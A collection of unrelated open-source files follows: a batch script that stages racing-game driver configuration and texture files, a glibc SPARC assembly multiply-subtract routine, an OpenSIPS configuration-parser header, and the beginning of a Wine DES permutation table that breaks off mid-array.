if exist .\src\drivers\tita\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita\9
if exist .\src\drivers\tita\9\default.xml copy .\src\drivers\tita\9\default.xml .\%RUNTIMEDIR%\drivers\tita\9\default.xml
if exist .\src\drivers\tita\9\car7-trb1.rgb copy .\src\drivers\tita\9\car7-trb1.rgb .\%RUNTIMEDIR%\drivers\tita\9\car7-trb1.rgb
rem Driver-level files: module descriptor (tita.xml) and UI logo.
if exist .\src\drivers\tita\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\tita\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\tita\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\tita
if exist .\src\drivers\tita\tita.xml copy .\src\drivers\tita\tita.xml .\%RUNTIMEDIR%\drivers\tita\tita.xml
if exist .\src\drivers\tita\logo.rgb copy .\src\drivers\tita\logo.rgb .\%RUNTIMEDIR%\drivers\tita\logo.rgb
rem --- Driver "lliaw": stage per-car setup files (default.xml) and, for
rem --- cars 3 and up, livery textures (*.rgb) from .\src\drivers\lliaw\<N>
rem --- into .\%RUNTIMEDIR%\drivers\lliaw\<N>. Same auto-generated guarded
rem --- create_dir/copy pattern as the other driver sections; create_dir is
rem --- an external helper batch file (presumably mkdir-if-missing).
if exist .\src\drivers\lliaw\1\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\lliaw\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\lliaw\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
if exist .\src\drivers\lliaw\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw\1
if exist .\src\drivers\lliaw\1\default.xml copy .\src\drivers\lliaw\1\default.xml .\%RUNTIMEDIR%\drivers\lliaw\1\default.xml
if exist .\src\drivers\lliaw\10\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\lliaw\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\lliaw\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
if exist .\src\drivers\lliaw\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw\10
if exist .\src\drivers\lliaw\10\default.xml copy .\src\drivers\lliaw\10\default.xml .\%RUNTIMEDIR%\drivers\lliaw\10\default.xml
if exist .\src\drivers\lliaw\2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\lliaw\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\lliaw\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
if exist .\src\drivers\lliaw\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw\2
if exist .\src\drivers\lliaw\2\default.xml copy .\src\drivers\lliaw\2\default.xml .\%RUNTIMEDIR%\drivers\lliaw\2\default.xml
if exist .\src\drivers\lliaw\3\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\lliaw\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\lliaw\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
if exist .\src\drivers\lliaw\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw\3
if exist .\src\drivers\lliaw\3\default.xml copy .\src\drivers\lliaw\3\default.xml .\%RUNTIMEDIR%\drivers\lliaw\3\default.xml
if exist .\src\drivers\lliaw\3\car1-trb1.rgb copy .\src\drivers\lliaw\3\car1-trb1.rgb .\%RUNTIMEDIR%\drivers\lliaw\3\car1-trb1.rgb
if exist .\src\drivers\lliaw\4\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\lliaw\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\lliaw\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
if exist .\src\drivers\lliaw\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw\4
if exist .\src\drivers\lliaw\4\default.xml copy .\src\drivers\lliaw\4\default.xml .\%RUNTIMEDIR%\drivers\lliaw\4\default.xml
if exist .\src\drivers\lliaw\4\car2-trb1.rgb copy .\src\drivers\lliaw\4\car2-trb1.rgb .\%RUNTIMEDIR%\drivers\lliaw\4\car2-trb1.rgb
if exist .\src\drivers\lliaw\5\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\lliaw\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\lliaw\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
if exist .\src\drivers\lliaw\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw\5
if exist .\src\drivers\lliaw\5\default.xml copy .\src\drivers\lliaw\5\default.xml .\%RUNTIMEDIR%\drivers\lliaw\5\default.xml
if exist .\src\drivers\lliaw\5\car3-trb1.rgb copy .\src\drivers\lliaw\5\car3-trb1.rgb .\%RUNTIMEDIR%\drivers\lliaw\5\car3-trb1.rgb
if exist .\src\drivers\lliaw\6\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\lliaw\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\lliaw\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
if exist .\src\drivers\lliaw\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw\6
if exist .\src\drivers\lliaw\6\default.xml copy .\src\drivers\lliaw\6\default.xml .\%RUNTIMEDIR%\drivers\lliaw\6\default.xml
if exist .\src\drivers\lliaw\6\car4-trb1.rgb copy .\src\drivers\lliaw\6\car4-trb1.rgb .\%RUNTIMEDIR%\drivers\lliaw\6\car4-trb1.rgb
if exist .\src\drivers\lliaw\7\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\lliaw\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\lliaw\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
if exist .\src\drivers\lliaw\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw\7
if exist .\src\drivers\lliaw\7\default.xml copy .\src\drivers\lliaw\7\default.xml .\%RUNTIMEDIR%\drivers\lliaw\7\default.xml
if exist .\src\drivers\lliaw\7\car5-trb1.rgb copy .\src\drivers\lliaw\7\car5-trb1.rgb .\%RUNTIMEDIR%\drivers\lliaw\7\car5-trb1.rgb
if exist .\src\drivers\lliaw\8\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\lliaw\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\lliaw\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
if exist .\src\drivers\lliaw\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw\8
if exist .\src\drivers\lliaw\8\default.xml copy .\src\drivers\lliaw\8\default.xml .\%RUNTIMEDIR%\drivers\lliaw\8\default.xml
if exist .\src\drivers\lliaw\8\car6-trb1.rgb copy .\src\drivers\lliaw\8\car6-trb1.rgb .\%RUNTIMEDIR%\drivers\lliaw\8\car6-trb1.rgb
if exist .\src\drivers\lliaw\9\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\lliaw\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\lliaw\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
if exist .\src\drivers\lliaw\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw\9
if exist .\src\drivers\lliaw\9\default.xml copy .\src\drivers\lliaw\9\default.xml .\%RUNTIMEDIR%\drivers\lliaw\9\default.xml
if exist .\src\drivers\lliaw\9\car7-trb1.rgb copy .\src\drivers\lliaw\9\car7-trb1.rgb .\%RUNTIMEDIR%\drivers\lliaw\9\car7-trb1.rgb
if exist .\src\drivers\lliaw\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\lliaw\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\lliaw\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
if exist .\src\drivers\lliaw\lliaw.xml copy .\src\drivers\lliaw\lliaw.xml .\%RUNTIMEDIR%\drivers\lliaw\lliaw.xml
if exist .\src\drivers\lliaw\logo.rgb copy .\src\drivers\lliaw\logo.rgb .\%RUNTIMEDIR%\drivers\lliaw\logo.rgb
if exist .\src\drivers\olethros\0\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\olethros\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\olethros\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros
if exist .\src\drivers\olethros\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros\0
if exist .\src\drivers\olethros\0\default.xml copy .\src\drivers\olethros\0\default.xml .\%RUNTIMEDIR%\drivers\olethros\0\default.xml
if exist .\src\drivers\olethros\1\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\olethros\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\olethros\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros
if exist .\src\drivers\olethros\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros\1
if exist .\src\drivers\olethros\1\default.xml copy .\src\drivers\olethros\1\default.xml .\%RUNTIMEDIR%\drivers\olethros\1\default.xml
if exist .\src\drivers\olethros\2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\olethros\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\olethros\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros
if exist .\src\drivers\olethros\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros\2
if exist .\src\drivers\olethros\2\default.xml copy .\src\drivers\olethros\2\default.xml .\%RUNTIMEDIR%\drivers\olethros\2\default.xml
if exist .\src\drivers\olethros\2\car1-trb1.rgb copy .\src\drivers\olethros\2\car1-trb1.rgb .\%RUNTIMEDIR%\drivers\olethros\2\car1-trb1.rgb
if exist .\src\drivers\olethros\3\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\olethros\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\olethros\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros
if exist .\src\drivers\olethros\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros\3
if exist .\src\drivers\olethros\3\default.xml copy .\src\drivers\olethros\3\default.xml .\%RUNTIMEDIR%\drivers\olethros\3\default.xml
if exist .\src\drivers\olethros\3\car2-trb1.rgb copy .\src\drivers\olethros\3\car2-trb1.rgb .\%RUNTIMEDIR%\drivers\olethros\3\car2-trb1.rgb
if exist .\src\drivers\olethros\4\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\olethros\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\olethros\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros
if exist .\src\drivers\olethros\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros\4
if exist .\src\drivers\olethros\4\default.xml copy .\src\drivers\olethros\4\default.xml .\%RUNTIMEDIR%\drivers\olethros\4\default.xml
if exist .\src\drivers\olethros\4\car3-trb1.rgb copy .\src\drivers\olethros\4\car3-trb1.rgb .\%RUNTIMEDIR%\drivers\olethros\4\car3-trb1.rgb
if exist .\src\drivers\olethros\5\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\olethros\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\olethros\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros
if exist .\src\drivers\olethros\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros\5
if exist .\src\drivers\olethros\5\default.xml copy .\src\drivers\olethros\5\default.xml .\%RUNTIMEDIR%\drivers\olethros\5\default.xml
if exist .\src\drivers\olethros\5\car4-trb1.rgb copy .\src\drivers\olethros\5\car4-trb1.rgb .\%RUNTIMEDIR%\drivers\olethros\5\car4-trb1.rgb
if exist .\src\drivers\olethros\6\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\olethros\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\olethros\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros
if exist .\src\drivers\olethros\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros\6
if exist .\src\drivers\olethros\6\default.xml copy .\src\drivers\olethros\6\default.xml .\%RUNTIMEDIR%\drivers\olethros\6\default.xml
if exist .\src\drivers\olethros\6\car5-trb1.rgb copy .\src\drivers\olethros\6\car5-trb1.rgb .\%RUNTIMEDIR%\drivers\olethros\6\car5-trb1.rgb
if exist .\src\drivers\olethros\7\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\olethros\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\olethros\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros
if exist .\src\drivers\olethros\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros\7
if exist .\src\drivers\olethros\7\default.xml copy .\src\drivers\olethros\7\default.xml .\%RUNTIMEDIR%\drivers\olethros\7\default.xml
if exist .\src\drivers\olethros\7\car6-trb1.rgb copy .\src\drivers\olethros\7\car6-trb1.rgb .\%RUNTIMEDIR%\drivers\olethros\7\car6-trb1.rgb
if exist .\src\drivers\olethros\8\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\olethros\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\olethros\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros
if exist .\src\drivers\olethros\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros\8
if exist .\src\drivers\olethros\8\default.xml copy .\src\drivers\olethros\8\default.xml .\%RUNTIMEDIR%\drivers\olethros\8\default.xml
if exist .\src\drivers\olethros\8\car7-trb1.rgb copy .\src\drivers\olethros\8\car7-trb1.rgb .\%RUNTIMEDIR%\drivers\olethros\8\car7-trb1.rgb
if exist .\src\drivers\olethros\9\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\olethros\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\olethros\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros
if exist .\src\drivers\olethros\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros\9
if exist .\src\drivers\olethros\9\default.xml copy .\src\drivers\olethros\9\default.xml .\%RUNTIMEDIR%\drivers\olethros\9\default.xml
if exist .\src\drivers\olethros\9\car1-trb3.rgb copy .\src\drivers\olethros\9\car1-trb3.rgb .\%RUNTIMEDIR%\drivers\olethros\9\car1-trb3.rgb
if exist .\src\drivers\olethros\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\olethros\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\olethros\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\olethros
if exist .\src\drivers\olethros\olethros.xml copy .\src\drivers\olethros\olethros.xml .\%RUNTIMEDIR%\drivers\olethros\olethros.xml
if exist .\src\drivers\olethros\logo.rgb copy .\src\drivers\olethros\logo.rgb .\%RUNTIMEDIR%\drivers\olethros\logo.rgb
if exist .\src\libs\raceengineclient\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\libs\raceengineclient\*.* call .\create_dir .\%RUNTIMEDIR%\config
if exist .\src\libs\raceengineclient\raceengine.xml copy .\src\libs\raceengineclient\raceengine.xml .\%RUNTIMEDIR%\config\raceengine.xml
if exist .\src\libs\raceengineclient\style.xsl copy .\src\libs\raceengineclient\style.xsl .\%RUNTIMEDIR%\config\style.xsl
if exist .\src\libs\tgf\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\libs\tgf\*.* call .\create_dir .\%RUNTIMEDIR%\config
if exist .\src\libs\tgf\params.dtd copy .\src\libs\tgf\params.dtd .\%RUNTIMEDIR%\config\params.dtd
if exist .\src\libs\tgfclient\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\libs\tgfclient\*.* call .\create_dir .\%RUNTIMEDIR%\config
if exist .\src\libs\tgfclient\screen.xml copy .\src\libs\tgfclient\screen.xml .\%RUNTIMEDIR%\config\screen.xml
if exist .\src\modules\graphic\ssggraph\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\modules\graphic\ssggraph\*.* call .\create_dir .\%RUNTIMEDIR%\config
if exist .\src\modules\graphic\ssggraph\graph.xml copy .\src\modules\graphic\ssggraph\graph.xml .\%RUNTIMEDIR%\config\graph.xml
if exist .\src\modules\graphic\ssggraph\sound.xml copy .\src\modules\graphic\ssggraph\sound.xml .\%RUNTIMEDIR%\config\sound.xml
if exist .\src\modules\telemetry\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\modules\telemetry\*.* call .\create_dir .\%RUNTIMEDIR%\telemetry
if exist .\src\modules\telemetry\telemetry.sh copy .\src\modules\telemetry\telemetry.sh .\%RUNTIMEDIR%\telemetry\telemetry.sh
if exist .\src\raceman\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\raceman\*.* call .\create_dir .\%RUNTIMEDIR%\config
if exist .\src\raceman\*.* call .\create_dir .\%RUNTIMEDIR%\config\raceman
if exist .\src\raceman\champ.xml copy .\src\raceman\champ.xml .\%RUNTIMEDIR%\config\raceman\champ.xml
if exist .\src\raceman\dtmrace.xml copy .\src\raceman\dtmrace.xml .\%RUNTIMEDIR%\config\raceman\dtmrace.xml
if exist .\src\raceman\endrace.xml copy .\src\raceman\endrace.xml .\%RUNTIMEDIR%\config\raceman\endrace.xml
if exist .\src\raceman\ncrace.xml copy .\src\raceman\ncrace.xml .\%RUNTIMEDIR%\config\raceman\ncrace.xml
if exist .\src\raceman\practice.xml copy .\src\raceman\practice.xml .\%RUNTIMEDIR%\config\raceman\practice.xml
if exist .\src\raceman\quickrace.xml copy .\src\raceman\quickrace.xml .\%RUNTIMEDIR%\config\raceman\quickrace.xml
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\results
call .\create_dir .\%RUNTIMEDIR%\results\champ
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\results
call .\create_dir .\%RUNTIMEDIR%\results\dtmrace
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\results
call .\create_dir .\%RUNTIMEDIR%\results\endrace
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\results
call .\create_dir .\%RUNTIMEDIR%\results\ncrace
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\results
call .\create_dir .\%RUNTIMEDIR%\results\practice
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\results
call .\create_dir .\%RUNTIMEDIR%\results\quickrace
if exist .\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\*.* call .\create_dir .\%RUNTIMEDIR%\.
if exist .\setup_linux.sh copy .\setup_linux.sh .\%RUNTIMEDIR%\.\setup_linux.sh
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\drivers
call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\drivers
call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\drivers
call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\drivers
call .\create_dir .\%RUNTIMEDIR%\drivers\bt
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\drivers
call .\create_dir .\%RUNTIMEDIR%\drivers\damned
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\drivers
call .\create_dir .\%RUNTIMEDIR%\drivers\human
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\drivers
call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\drivers
call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\drivers
call .\create_dir .\%RUNTIMEDIR%\drivers\lliaw
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\drivers
call .\create_dir .\%RUNTIMEDIR%\drivers\sparkle
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\drivers
call .\create_dir .\%RUNTIMEDIR%\drivers\tita
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\.
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\.
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\.
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\.
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\.
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\.
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\.
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\.
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\modules
call .\create_dir .\%RUNTIMEDIR%\modules\graphic
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\modules
call .\create_dir .\%RUNTIMEDIR%\modules\simu
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\modules
call .\create_dir .\%RUNTIMEDIR%\modules\simu
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\modules
call .\create_dir .\%RUNTIMEDIR%\modules\telemetry
call .\create_dir .\%RUNTIMEDIR%
call .\create_dir .\%RUNTIMEDIR%\modules
call .\create_dir .\%RUNTIMEDIR%\modules\track
| {
"pile_set_name": "Github"
} |
! SPARC v9 64-bit VIS3 __mpn_submul_1 -- Multiply a limb vector with a
! limb and subtract the result from a second limb vector.
!
! Copyright (C) 2013-2018 Free Software Foundation, Inc.
! This file is part of the GNU C Library.
! Contributed by David S. Miller <[email protected]>
!
! The GNU C Library is free software; you can redistribute it and/or
! modify it under the terms of the GNU Lesser General Public
! License as published by the Free Software Foundation; either
! version 2.1 of the License, or (at your option) any later version.
!
! The GNU C Library is distributed in the hope that it will be useful,
! but WITHOUT ANY WARRANTY; without even the implied warranty of
! MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
! Lesser General Public License for more details.
!
! You should have received a copy of the GNU Lesser General Public
! License along with the GNU C Library; if not, see
! <http://www.gnu.org/licenses/>.
#include <sysdep.h>

! Argument registers after the register-window save (SPARC64 ABI:
! incoming %o0-%o3 become %i0-%i3).
#define res_ptr %i0
#define s1_ptr %i1
#define sz %i2
#define s2_limb %i3
! Running borrow word; handed back to the caller in %o0 by the restore.
#define carry %o5
! Scratch registers for the two-limb-per-iteration pipeline.
#define tmp1 %g1
#define tmp2 %g2
#define tmp3 %g3
#define tmp4 %o4
#define tmp5 %l0
#define tmp6 %l1
#define tmp7 %l2
#define tmp8 %l3

.register %g2,#scratch
.register %g3,#scratch

! res_ptr[0..sz-1] -= s1_ptr[0..sz-1] * s2_limb, propagating the borrow
! through the vector; the final borrow word is returned.  Uses the VIS3
! umulxhi instruction for the high 64 bits of the 64x64-bit product.
ENTRY(__mpn_submul_1_vis3)
	save	%sp, -176, %sp
	subcc	sz, 1, sz		! sz -= 1; condition codes pick the 1-limb path
	be	.Lfinal_limb		! exactly one limb: skip the unrolled loop
	 clr	carry			! (delay slot) start with zero borrow
.Lloop:
	! Two limbs per iteration: load both source and both dest limbs.
	ldx	[s1_ptr + 0x00], tmp1
	ldx	[res_ptr + 0x00], tmp3
	ldx	[s1_ptr + 0x08], tmp2
	ldx	[res_ptr + 0x08], tmp4
	mulx	tmp1, s2_limb, tmp5	! low 64 bits of s1[0] * limb
	add	s1_ptr, 0x10, s1_ptr
	umulxhi	tmp1, s2_limb, tmp6	! high 64 bits of s1[0] * limb
	add	res_ptr, 0x10, res_ptr
	mulx	tmp2, s2_limb, tmp7	! low 64 bits of s1[1] * limb
	sub	sz, 2, sz
	umulxhi	tmp2, s2_limb, tmp8	! high 64 bits of s1[1] * limb
	addcc	carry, tmp5, tmp5	! add incoming borrow to low product
	addxc	%g0, tmp6, carry	! carry = high product + carry-out
	subcc	tmp3, tmp5, tmp5	! dest limb minus product (sets borrow)
	addxc	%g0, carry, carry	! fold the subtraction borrow into carry
	stx	tmp5, [res_ptr - 0x10]
	addcc	carry, tmp7, tmp7	! same sequence for the second limb
	addxc	%g0, tmp8, carry
	subcc	tmp4, tmp7, tmp7
	addxc	%g0, carry, carry
	brgz	sz, .Lloop
	 stx	tmp7, [res_ptr - 0x08]	! (delay slot) store second result limb

	brlz,pt	sz, .Lfinish		! sz < 0: even count, nothing left over
	 nop
.Lfinal_limb:
	! Odd trailing limb: one more multiply/subtract without unrolling.
	ldx	[s1_ptr + 0x00], tmp1
	ldx	[res_ptr + 0x00], tmp3
	mulx	tmp1, s2_limb, tmp5
	umulxhi	tmp1, s2_limb, tmp6
	addcc	carry, tmp5, tmp5
	addxc	%g0, tmp6, carry
	subcc	tmp3, tmp5, tmp5
	addxc	%g0, carry, carry
	stx	tmp5, [res_ptr + 0x00]
.Lfinish:
	jmpl	%i7 + 8, %g0		! return to caller
	 restore carry, 0, %o0		! (delay slot) return value = final borrow
END(__mpn_submul_1_vis3)
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2012 OpenSIPS Solutions
*
* This file is part of opensips, a free SIP server.
*
* opensips is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version
*
* opensips is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
* History:
* -------
* 2012-01-19 created (vlad)
*/
#ifndef _parser_h_
#define _parser_h_

#include "menus.h"
#include "cfg.h"

/* Markers delimiting a group of related #define entries in a parsed file. */
#define GRP_START_STR "#DEFS_GROUP_START"
#define GRP_END_STR "#DEFS_GROUP_END"
/* Lines starting with this prefix are skipped by the parsers. */
#define SKIP_LINE_STR "##"
#define SKIP_LINE_STRL 2	/* length of SKIP_LINE_STR */

/* All parse_* functions below take a raw text line (or file context) and
   populate the given menu structure; they return an int status code
   (exact success/failure convention defined in the implementation --
   verify against parser.c before relying on it). */

/* Parse a module-dependency line belonging to the given parent menu. */
int parse_dep_line(char *line,select_menu *parent);
/* Parse an include directive line for the given parent menu. */
int parse_include_line(char *line,select_menu *parent);
/* Parse one defs line; group_idx tracks the current group index and
   start_grp flags whether a GRP_START_STR block is currently open. */
int parse_defs_line(char *line,select_menu *parent,int *group_idx,int *start_grp);
/* Parse an install-prefix line for the given menu. */
int parse_prefix_line(char *line,select_menu *menu);
/* Parse a single m4 definition line for the given menu. */
int parse_defs_m4_line(char *line,select_menu *menu);
/* Parse the m4 defs input associated with curr_menu / curr_cfg. */
int parse_defs_m4(select_menu *curr_menu,cfg_gen_t *curr_cfg);
/* Parse the Makefile configuration (make conf) settings. */
int parse_make_conf();

#endif
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2004 Hans Leidekker
* Copyright 2006 Mike McCormack
*
* Based on DES.c from libcifs
*
* Copyright (C) 2003, 2004 by Christopher R. Hertel
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA
*/
#include "windef.h"
#include "crypt.h"
static const unsigned char InitialPermuteMap[64] =
{
57, 49, 41, 33, 25, 17, 9, 1,
59, 51, 43, 35, 27, 19, 11, 3,
61, 53, 45, 37, 29, 21, 13, 5,
63, 55, 47, 39, 31, 23, 15, 7,
56, 48, 40, 32, 24, 16, 8, 0,
58, 50, 42, 34, 26, 18, 10, 2,
60, 52, 44, 36, 28, 20, 12, 4,
62, 54, 46, 38, 30, 22, 14, 6
};
static const unsigned char KeyPermuteMap[56] =
{
49, 42, 35, 28, 21, 14, 7, 0,
50, 43, 36, 29, 22, 15, 8, 1,
51, 44, 37, 30, 23, 16, 9, 2,
52, 45, 38, 31, 55, 48, 41, 34,
